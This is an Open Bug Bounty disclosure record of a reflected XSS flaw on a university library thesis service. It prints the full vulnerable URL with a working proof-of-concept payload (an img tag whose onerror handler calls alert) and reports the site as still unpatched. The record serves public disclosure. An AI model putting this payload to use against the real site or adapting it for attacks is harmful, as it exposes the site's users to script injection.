etds.lib.ncku.edu.tw XSS vulnerability

2016-06-14T11:24:00
ID OBB:159202
Type openbugbounty
Reporter 524Dart
Modified 2016-09-07T08:12:00

Description

Vulnerable URL:
http://etds.lib.ncku.edu.tw/etdservice/detail?n=10&list;=141%E3%80%81142%E3%80%81143%E3%80%81144%E3%80%81145%E3%80%81%3Cimg%20src=1%20onerror=alert`OPENBUGBOUNTY`%3E,146%E3%80%81147%E3%80%81148%E3%80%81149%E3%80%81150%E3%80%81&etdun1;=U0026-0812200913430498&etdun2;=U0026-0812200913402215&etdun3;=U0026-0812200913435487&etdun4;=U0026-0812200913545256&etdun5;=U0026-0812200913395460&etdun6;=U0026-0812200913545765&etdun7;=U0026-0812200913492226&etdun8;=U0026-0812200913540987&etdun9;=U0026-0812200913583214&etdun10;=U0026-0812200913472739&&query;_field1=keyword&query;_word1=HP&start;=141&end;=150
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check etds.lib.ncku.edu.tw SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 14 June, 2016 11:24 GMT
Vulnerability existence verified and confirmed| 15 June, 2016 07:54 GMT
Vulnerability details disclosed by researcher| 7 September, 2016 08:12 GMT